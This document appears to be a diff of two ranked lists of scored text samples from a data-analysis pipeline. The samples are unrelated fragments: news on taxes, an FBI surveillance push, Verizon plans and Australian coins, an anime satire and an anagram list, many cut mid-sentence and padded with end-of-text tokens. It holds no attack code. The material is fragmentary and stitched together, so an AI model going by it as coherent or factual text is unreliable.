tweaks!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 72; Score = 4177920.0 -<|begin_of_text|>Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings. +Rank = 72; Score = 2293760.0 +<|begin_of_text|>The twelve-sided Australian fifty-cent coin is the third-highest denomination coin of the Australian dollar and the largest in terms of size in circulation. It is the only 12-sided coin of its size in the southern hemisphere. It was introduced in 1969 [2] to replace the round fifty-cent coin issued in 1966. -Oct. 23, 2017, 12:39 PM GMT / Updated Oct. 23, 2017, 12:39 PM GMT By Chuck Todd, Mark Murray and Carrie Dann +The original, round, 50-cent coin was made of 80% silver and 20% copper; but as the value of a free-floating silver price became higher, the coin's bullion value became more valuable than its face value; so that version was withdrawn from circulation and replaced with the dodecagonal cupro-nickel version. -First Read is your briefing from Meet the Press and the NBC Political Unit on the day's most important political stories and why they matter. +It is by diameter the largest Australian coin currently issued and second largest after the Crown of 1937–38. It is also the heaviest Australian coin in common circulation. Many commemorative designs have been issued, the large size allowing for detailed content. -GOP wrestles with tax politics — but what about the policy? +With a diameter of 31.65 mm (1.25 in), the 50-cent coin is one of the largest in volume among those currently circulating in the world. Coins of larger diameter include the Costa Rican five-hundred-colones and the fifty-CFP Franc, both 32.9 mm. -WASHINGTON — On a conference call Sunday afternoon with House Republicans, NBC’s Kasie Hunt reports, President Trump issued this warning: The GOP needs to pass his tax plan or it will lose in the 2018 midterms. +Five-cent, ten-cent, twenty-cent, and fifty-cent coins are legal tender up to the sum of $5.[3] -Failure, he said, would be “really bad” for the party in next year’s elections, while success would be “like skating on ice.” +Obverse [ edit ] -But that focus on the tax plan’s electoral politics — when the midterm cake is already being baked — ignores the more important policy questions right now. +As with all coins of Australia, the reigning monarch features on the obverse. Only Elizabeth II has been monarch during the coin's existence. -Will the GOP tax plan really RAISE taxes on middle-class and upper-middle-class Americans? Given that the initial plan eliminates personal exemptions (replaced by a larger standard deduction), the nonpartisan Tax Policy Center said one-quarter of American taxpayers would pay higher taxes by 2027, including 30 percent with incomes between $50,000 and $150,000 and 60 percent of those making between $150,000 and $300,000. +Unlike other decimal denominations, four different portraits of Her Majesty have been used on 50c coins. A unique effigy by Vladimir Gottwald was used for the 2000 Royal Visit commemorative fifty-cent piece.[4][5] This is the only Australian decimal coin to have an obverse designed by an Australian[6] and to have a portrait of the queen which is not also used on British currency. -How much will the plan add to the deficit? The Treasury Department announced Friday that the federal budget deficit increased to $666 billion in the just-completed fiscal year – up from $585 billion last year. And that’s significant, because the Tax Policy Center says the GOP tax plan would reduce revenues by $2.4 trillion over the first 10 years (or $240 billion per year). +The other three portraits have featured on all then-current denominations: from 1966 to 1984 one by Arnold Machin,[7] from 1985 to 1998 one by Raphael Maklouf,[8] and since 1999 a portrait by Ian Rank-Broadley.[9] These portraits were introduced to British coins in 1968, 1985, and 1998 respectively.[10] -How much will the wealthy benefit vs. everyone else? Since the GOP proposal, among other things, eliminates the estate tax and lowers taxes for “pass-through” businesses, the same Tax Policy Center says that more than half of the benefits in the first year go to the Top 1 percent of taxpayers, while 30 percent of the benefits will go to the Top 0.1 percent. +Commemorative coins [ edit ] -Are Republicans really going to tax 401k accounts? That has been one of the trial balloons that Republicans have released. “The proposals under discussion would potentially cap the annual amount workers can set aside to as low as $2,400 for 401(k) accounts, +The Australian fifty-cent coin was the first to display a variation of the reverse design in 1970 for the commemorating ================================================================================ -Rank = 73; Score = 4161536.0 -<|begin_of_text|>Buy Photo State senator Virgil Smith holds his head down in Judge Lawrence Talon's courtroom at the Frank Murphy Hall of Justice in Detroit on Monday, March14, 2016. Smith's ex-wife Anistia Thomas is seen behind. Smith will serve 10 months in jail with no early release and comply with psychiatric, alcohol and drug counseling, but does not have to give up his senate seat. Jessica J. Trevino/Detroit Free Press. (Photo: Jessica J. Trevino, Detroit Free Press)Buy Photo +Rank = 73; Score = 2293760.0 +<|begin_of_text|>Verizon is getting rid of contract plans, switching its offerings over to month-to-month plans like AT&T and T-Mobile did before it. Verizon's new plans are all based around shared data buckets — there's no single line or family plan. Instead, subscribers pay for a specific amount of data and then pay a per-device fee to hook it into the plan. -A judge on Monday sentenced embattled state Sen. Virgil Smith to 10 months in jail with no early release but did not require him to resign from his job as a legislator, which was part of a sentencing agreement in the case against him. +Everyone loves per-line access fees! -"It would be illegal for me to impose as a condition of sentence that he resign from office and that he not hold public office during the pendency of his probation,” Wayne County Circuit Judge Lawrence Talon said during the hearing. +The options include 1GB for $30 per month, 3GB for $45 per month, 6GB for $60 per month, and 12GB for $80 per month. Adding a smartphone to the plan is $20 per month, adding a tablet or hotspot is $10 per month, and adding a smartwatch is $5 per month. Verizon says that larger plans will be available for those who want them; for those who just need a little bit of extra data one month, Recode reports that they'll be stuck paying $15 for an extra gigabyte, though they can always jump up to a new plan the next month. As usual, the pricing is not really friendly or tailored for anyone, but Verizon is under the odd impression that it's easier to understand. -The decision means prosecutors could now pull the agreement they reached with the defense because it required Smith to resign. +The plans go live next Thursday, on August 13th. Current Verizon subscribers will be able to hang onto their existing plans or switch over to the new plans "with some restrictions." -As part of the plea, Smith, 36, D-Detroit, pleaded guilty to a felony count of malicious destruction of personal property of $20,000 or more last month and admitted shooting his ex-wife's 2015 Mercedes-Benz on May 10, 2015. +Though doing away with contracts is a big shift, it's something we've seen coming. T-Mobile kicked off the trend about two years ago, and AT&T began following it recently by dropping contract offerings from third-party sellers. Alongside the shift away from contracts is the shift away from subsidized phones, meaning that people are going to need to start buying phones at full price or using carriers' payment plans. Verizon has been offering such a plan under the name Edge, though it's now decided to rename it "device payment option," which actually is easier to understand.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 74; Score = 2293760.0 +<|begin_of_text|>PoliZette Jimmy Carter: ‘Media Have Been Harder on Trump Than Any Other President’ Says Russia didn't change the election outcome, president's doing great on North Korea, and players should stand for the anthem -Talon said Smith could be expelled, voted out of office or resign but requiring him to step down “offends the state constitution.” +Former President Jimmy Carter broke away from his own party, coming to President Donald Trump’s defense and saying, “The media have been harder on Trump than any other president.” -"You do not have to resign from the Senate," he told Smith, explaining his ruling. "I'm taking that off the plea agreement." +In a wide-ranging interview with The New York Times published on Saturday, Carter seemed to ally himself with Trump, criticizing the media for its coverage of the new administration. -It’s not yet known if Smith will voluntarily resign from office, though some say they expect that to happen. +Advertisement -“The plea is legal, and the defendant agreed to it,” Wayne County Prosecutor Kym Worthy said in a statement released after the two-hour hearing in the Frank Murphy Hall of Justice. “If all the conditions are not accepted by the court, we will withdraw our plea. We are certain that we stand on solid legal ground.” +[lz_ndn video=”33150334″] -Smith told investigators the shots were fired after his ex-wife, Anistia Thomas, pushed her way into his house on Wexford and attempted to attack the woman in his bed. +“I think the media have been harder on Trump than any other president certainly that I’ve known about,” Carter told The Times. “I think they feel free to claim that Trump is mentally deranged and everything else without hesitation.” -Thomas previously testified Smith punched her in the face and rammed her head into the floor and wall when she was inside his home. She gave a statement in the courtroom Monday, saying Smith has lied to save face and is "still blaming me -================================================================================ -Rank = 74; Score = 4161536.0 -<|begin_of_text|>Anime graduate programs announced a new decision to award physics PhD degrees to those who fail the anime qualifying exam. +In addition, Carter also aligned himself with Trump on the issue of whether or not football players should stand while the national anthem is being played before games. Trump reignited the controversy in late September when he urged football coaches to bench players who choose to protest against racial injustice in the country by kneeling instead of standing during the anthem. Since then, National Football League ratings have plummeted while many sports fans expressed their disapproval of kneeling during the anthem and politicizing a patriotic tradition. -The decision came after many years of low passing rates and complaints that anime PhDs have been too exclusive and mentally strenuous. MIT’s Dean of Admissions also reasoned that many of the questions on the anime qualifying exam “require the same, if not more amount of critical and analytical thinking that the physics exams do.” +“I think they ought to find a different way to object, to demonstrate. I would rather see all the players stand during the American anthem,” Carter said. -Past graduate exams included questions on harem attractive field lines, the capacitance of a tsundere’s ability to withhold love confessions, and the leading shifts in the energies of the degenerate first excited states of main character power ups. Most students who failed the exam claimed that it was the section on modern anime that tricked them up. +The former president also pushed back against one of the prevailing narratives Democrats and liberal-leaning media outlets have pushed in the days following Trump’s astonishing Election Day victory: whether or not the Russians affected voting outcomes. In addition, Carter said he wasn’t bothered particularly with Trump’s desire to cultivate a stronger and more diplomatic relationship with Russian President Vladimir Putin. -“In the written exam, I had to manipulate the twin paradox setup such that the twin who traveled to a distant star and the twin on earth met at some intermediate point on the same day as the repulsive force of dubbed anime exceeded the attractive force of subbed anime,” said Shuning Li, who failed the exam and was forced to find a job in research. +“At the Carter Center,” the former president said, “we deal with Putin and the Russians quite frequently concerning Syria.” -Most students also assert that the anime qualifying exam has a notoriously difficult oral exam in which a committee of three faculty members interview the student about their research. The student is then asked to solve a difficult problem in the student’s general field of study. The problem slated for 2016 was purported to be about evaluating key frame density and quantization of Kill la Kill fight scenes. +Carter added: “I don’t think there’s any evidence that what the Russians did changed enough votes, or any votes” during the 2016 presidential election. -With the consolation physics degree, many universities expect anime scholars to be satisfied with the apparent offset of the difficulty of the actual exam. However, scholars expressed indignance and found that this action condescending toward their level of knowledge. Anime students have also claimed that this move was an attempt to force them into unfulfilling life careers and stifle their pursuit of happiness. +Noting that he and his wife, Rosalynn, both voted for Sen. Bernie Sanders (I-Vt.) over Democratic presidential nominee Hillary Clinton during the primaries, Carter didn’t have many kind words to offer the Clintons. When The Times’ Maureen Dowd compared the Carter Center to the Clinton Foundation, Carter bristled. -“It’s all about doing what you love these days. I want to make a difference in the world and neutrinos don’t do anything,” said Richard Dembinski, a Johns Hopkins Undergraduate studying the biomedical engineering of nekomimis. “What can I do with something as impractical as a physics degree? There’s a reason why I’m studying anime engineering.” +[lz_related_box id=”314330″] -Higher up officials have announced no intention to get rid of the consolation physics degree. In fact, many graduate schools have begun to change there anime programs to tailor the physics degree, expecting most anime students to fail out of their intended program. There is no known report of the anime qualifying exam being made easier for +“Rosie and I put money in the Carter Center. ================================================================================ -Rank = 75; Score = 4128768.0 -<|begin_of_text|>Thought of the Moment +Rank = 75; Score = 2293760.0 +<|begin_of_text|>SETT TV Profile Joined January 2011 77 Posts Last Edited: 2013-07-26 17:53:09 #1 -Death must be so beautiful. To lie in the soft brown earth, with the grasses waving above one's head, and listen to silence. To have no yesterday, and no tomorrow. To forget time, to forgive life, to be at peace. -Oscar Wilde, writer (1854-1900) +ASUS ROG releases the rules, map pool and the groups which start off the ASUS ROG Summer 2013 StarCraft II tournament in Helsinki August 1-3. -. It's free. Death must be so beautiful. To lie in the soft brown earth, with the grasses waving above one's head, and listen to silence. To have no yesterday, and no tomorrow. To forget time, to forgive life, to be at peace. -Oscar Wilde, writer (1854-1900) Receive quotations (and words) in our daily newsletter. It's free. +It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. -Satanic SkyCatkins SayCatkin SaysAntics YaksCask SanityCask SatinySack SanitySack SatinyYacks SatinYacks SaintYacks AntisYacks StainYack SaintsYack StainsYack SatinsScanty SakiA Antics SkyA Sacks TinyA Casks TinyA Stacks YinA Tacks YinsA Stack YinsA Yacks NitsA Yacks SnitA Yacks TinsA Tacky SinsA Yack SnitsA Scanty SkiA Cyans SkitA Cyans KitsA Cyan SkitsA Sac StinkyA Scats InkyA Casts InkyA Cays StinkA Cays KnitsA Cay StinksA Akin CystsA Yanks TicsA Snaky TicsA San StickyA Nasty SickA Tansy SickA Antsy SickA Nays TicksA Nays StickA Nay SticksA Any SticksA Stays NickA Stay NicksSancta I SkyAntic As SkySnack Stay ISnack Say TiSnack Say ItSnack Ay SitSnack Ay ItsSnack Ay TisSnack Ya SitSnack Ya ItsSnack Ya TisSnacks Ay TiSnacks Ay ItSnacks Ya TiSnacks Ya ItCask Ani StyCask Nasty ICask Tansy ICask Antsy ICask Nays TiCask Nays ItCask Nay SitCask Nay ItsCask Nay TisCask Any SitCask Any ItsCask Any TisCask As TinyCask Sat YinCask Stay InCask Say NitCask Say TinCask At YinsCask Ay NitsC -================================================================================ -Rank = 76; Score = 4128768.0 -<|begin_of_text|>Prime Minister Justin Trudeau is abandoning his long-held promise to change the way Canadians vote in federal elections. +It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. Replacements -In a mandate letter for newly appointed Democratic Institutions Minister Karina Gould, Trudeau makes it clear that electoral reform — once top of mind for the Liberal government — is no longer on the agenda. +It is very unfortunate, but there have been more cancellations this week as Evil Geniuses.Jaedong, -“Changing the electoral system will not be in your mandate,” the prime minister writes in the letter, released Wednesday. +Evil Geniuses.Suppy, Millenium.ForGG, and are unable to attend the event. -A variety of consultations across the country have shown that Canadians are not clamouring for a change in the way they choose their federal government, the letter continues. It also rules out the possibility of a national referendum. +However, despite the proximity of the event, we were able to get noteworthy replacements: Dignitas.TargA, -“A clear preference for a new electoral system, let alone a consensus, has not emerged,” Trudeau writes. “Furthermore, without a clear preference or a clear question, a referendum would not be in Canada’s interest.” +NaVi.BabyKnight, prOperty.RunA, and will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time so that the tournament could retain its high standards. -Trudeau repeatedly promised — both as a campaigning Liberal leader and as prime minister in a speech from the throne — to get rid of the current first-past-the-post voting system in time for the 2019 federal election. +It is very unfortunate, but there have been more cancellations this week as Alliance.NaNiwa and Fnatic.NightEnD are unable to attend the event.However, despite the proximity of the event, we were able to get noteworthy replacements: Fnatic.Naama and Bischu will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time +================================================================================ +Rank = 76; Score = 2293760.0 +<|begin_of_text|>The FBI has been lobbying top internet companies like Yahoo and Google to support a proposal that would force them to provide backdoors for government surveillance, according to CNET. -The Liberals have since given themselves some wiggle room, saying they would not go ahead without the widespread support of Canadians. +The Bureau has been quietly meeting with representatives of these companies, as well as Microsoft (which owns Hotmail and Skype), Facebook and others to argue for a legislative proposal, drafted by the FBI, that would require social-networking sites and VoIP, instant messaging and e-mail providers to alter their code to make their products wiretap-friendly. -Canadians made their views known through the House of Commons special committee on electoral reform, town halls held by MPs from all parties, the travels of former minister Maryam Monsef and a much-maligned online survey called MyDemocracy.ca. +The FBI has previously complained to Congress about the so-called "Going Dark" problem – the difficulty of doing effective wiretap surveillance as more communications have moved from traditional telephone services to internet service companies. -The mandate letter shows that Trudeau and do not believe those consultations have produced their desired — albeit undefined — level of support for electoral reform, let alone any clarity on a preferred replacement. +Under the Communications Assistance for Law Enforcement Act, or CALEA, passed in 1994, telecommunications providers are required to make their systems wiretap-friendly. The Federal Communications Commission extended CALEA in 2004 to apply to broadband providers like ISPs and colleges, but web companies are not covered by the law. -The about-face is sure to provoke a passionate response from their political rivals. +CNET reports that in addition to this push from the FBI, the Federal Communications Commission may be looking at reinterpreting CALEA to demand that video and non-telephone-replacement VoIP products such as Skype and Xbox Live be modified to include backdoors that allow FBI surveillance. -The New Democrats, who have long called for a system of proportional representation, went into a meeting with Gould on Tuesday hoping to hear the new minister repeat Trudeau’s original, unequivocal promise: that the 2015 vote would be Canada’s last under first-past-the-post. +The news comes on the heels of another FBI plan that began kicking around in 2010 that would require backdoors in encrypted communication systems. That proposal, which would revisit the encryption wars of the 1990s, has failed to gather administration backing.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 77; Score = 2260992.0 +<|begin_of_text|>UK media organisations have made string of corrections and retractions as result of one man’s campaign for fair coverage -“That is why that ministry exists,” MP Nathan Cullen, the NDP’s democratic reform critic, said Tuesday. “That’s why she sits in cabinet, in large part — it’s to fulfill that promise.” +British media organisations have been forced to make a string of corrections and retractions over recent months relating to coverage of Muslims following routine monitoring. -The Conservatives, who had pushed for a referendum, are likely to be pleased with the status quo, but will no doubt excoriate the government for breaking such a prominent campaign commitment. +Miqdaad Versi, an assistant general secretary of the Muslim Council of Britain, has undertaken a personal project to track articles about Islam and Muslims in order to spot misrepresentations and inaccuracies. -There are also some big new items in the mandate letter. +He has secured almost 20 corrections and retractions, and a further 20 complaints are being examined by the press regulator, Ipso. Several complaints have been rejected. -Trudeau wants Gould, Defence Minister Harjit Sajjan and Public Safety Minister Ralph Goodale to come up with ways to defend the Canadian -================================================================================ -Rank = 77; Score = 4128768.0 -<|begin_of_text|>The FBI has been lobbying top internet companies like Yahoo and Google to support a proposal that would force them to provide backdoors for government surveillance, according to CNET. +Among the published corrections was a story published on the Sun website last week, originally headlined: “SUPERMARKET TERROR: Gunman ‘screaming Allahu Akbar’ opens fire in Spanish supermarket while ‘carrying bag filled with petrol and gunpowder’.” -The Bureau has been quietly meeting with representatives of these companies, as well as Microsoft (which owns Hotmail and Skype), Facebook and others to argue for a legislative proposal, drafted by the FBI, that would require social-networking sites and VoIP, instant messaging and e-mail providers to alter their code to make their products wiretap-friendly. +After Versi complained, the headline was changed to “SUPERMARKET HORROR: Gunman opens fire in Spanish supermarket while ‘carrying bag filled with petrol and gunpowder’.” -The FBI has previously complained to Congress about the so-called "Going Dark" problem – the difficulty of doing effective wiretap surveillance as more communications have moved from traditional telephone services to internet service companies. +The corrected text included a denial by local police and a spokesperson for the supermarket chain that the suspect had shouted “Allahu Akbar”. The Sun appended an apology to the story. Neither the Mail nor the Express corrected similar headlines. -Under the Communications Assistance for Law Enforcement Act, or CALEA, passed in 1994, telecommunications providers are required to make their systems wiretap-friendly. The Federal Communications Commission extended CALEA in 2004 to apply to broadband providers like ISPs and colleges, but web companies are not covered by the law. +Another was a story published on Mail Online suggesting the murder of a Muslim mother had been motivated by religion. The original headline said: “Mother of four stabbed to death while her family were at a funeral ‘may have been murdered in Islamic honour killing’.” -CNET reports that in addition to this push from the FBI, the Federal Communications Commission may be looking at reinterpreting CALEA to demand that video and non-telephone-replacement VoIP products such as Skype and Xbox Live be modified to include backdoors that allow FBI surveillance. +Versi complained to the news organisation, saying “honour killings” were rooted in culture not religion. Mail Online amended its headline to: “Mother of four stabbed to death while her family were at a funeral ‘may have been murdered in honour killing’”, and added a footnote stating: “An earlier version of this article said that police were investigating whether Ms Khan may have been murdered in an ‘Islamic honour killing’. We are happy to make clear that Islam as a religion does not support so-called ‘honour killings’.” -The news comes on the heels of another FBI plan that began kicking around in 2010 that would require backdoors in encrypted communication systems. That proposal, which would revisit the encryption wars of the 1990s, has failed to gather administration backing.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|